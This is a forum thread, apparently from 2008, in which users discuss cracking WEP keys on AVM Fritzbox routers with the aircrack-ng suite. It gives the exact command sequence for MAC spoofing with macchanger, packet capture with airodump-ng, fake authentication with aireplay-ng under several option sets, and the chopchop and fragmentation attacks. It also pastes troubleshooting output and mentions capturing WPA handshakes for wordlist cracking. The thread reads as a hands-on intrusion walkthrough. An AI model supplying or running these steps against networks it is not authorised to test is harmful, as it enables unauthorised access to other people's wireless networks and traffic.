Never came across a fritzbox yet. Aren't those made in Germany? Aahh... yes they are. Even the great CISCO routers & APs are vulnerable to at least the -5 Fragmentation attack. This Fritzbox shouldn't be any more difficult to crack. And you say you've tried ALL the available attacks?
I might have to go out and buy one of these and test it out myself. What attack are you using? And please list ALL commands you use....EXACTLY.
__________________
--=Xploitz=-- ®
Alright

Well I have another fritzbox that acts the same way, but playing with -1 6000 -o 10 I got it working... but this one still no luck, looks like AVM (builder of fritz box) have done something different!

What I do, well let's go... btw only change between both cards is rausb0 and wlan0, so I will do it only for the wlan0 interface!

ifconfig down wlan0
airmon-ng stop wlan0
macchanger -m 00:11:22:33:44:55
ifconfig up wlan0
airodump-ng wlan0

Let's say channel 11 and MAC 11:22:33:44:55:66

airodump -c 11 -w test --bssid 11:22:33:44:55:66 wlan0

Alright, now I have tested different methods, first starting the -3/-4/-5 attack and then -1, but usually I try it this way:

aireplay-ng -1 0 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0

(also tried with different variations like:
-1 6000 -o 1 -q 10
-1 6000 -o 10 -q 10 - successful for an older fritz box, giving me some ARPs
-1 512 -o 1 -q 30 )

After that I get ACK packages and everything is, so this command works! (and there is no MAC filtering enabled, just in case)

Then I start aireplay -4 or -5 attack:

aireplay-ng -4 -b 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0

I get some packet and I wanna use it then, then the described error above in the postings shows! That's all! Using the -5 attack there is also the error that packages are corrupt!

That's all! Looking forward
Hey Xploits I just did my first chop chop attack on my AP which worked great!

Really great tut, v easy to follow and integrate into your first wep cracking tut. This one also served its purpose as it shows an almost complete linux/aircrack suite n00b how to crack wep with no clients first time.

I have followed your third tut as well on wpa/wpa2, and gotten the 4 way handshake, though I gave up on cracking as I used that huge 2 gig word list, and didn't want to wait forever for it to crack. I'll use a smaller word list next time I try it, what's your default list? I've checked the share your wordlist thread, you recommend a few though I'd like to find out which word list is considered very efficient regarding thoroughness / size.

I read your last tut on speeding up the wpa crack, I'll try that as well, after I've finished tut3.

Cheers!
Mike
Hi all. Great tutorial, just have one question.
When doing "aireplay-ng -4" option, I wait until it finishes and then I get this message:

Code:
Warning: ICV checksum verification FAILED! Trying workaround
The AP appears to drop packets shorter than 34 bytes.
Enabling standard workaround: IP header re-creation.
This does look like an IP packet, try another one.
Workaround couldn't fix ICV checksum.
Packet is most likely invalid/useless
Try another one.

EDIT: I retried the step by saying "n" to the first packet it chose. I tried again several times until I had a different MAC address, and did not receive the error message. The rest worked like a charm! Great tutorial -=Xploitz=-!

Last edited by goosed; 10-15-2008 at 03:34 PM. Reason: Noobetry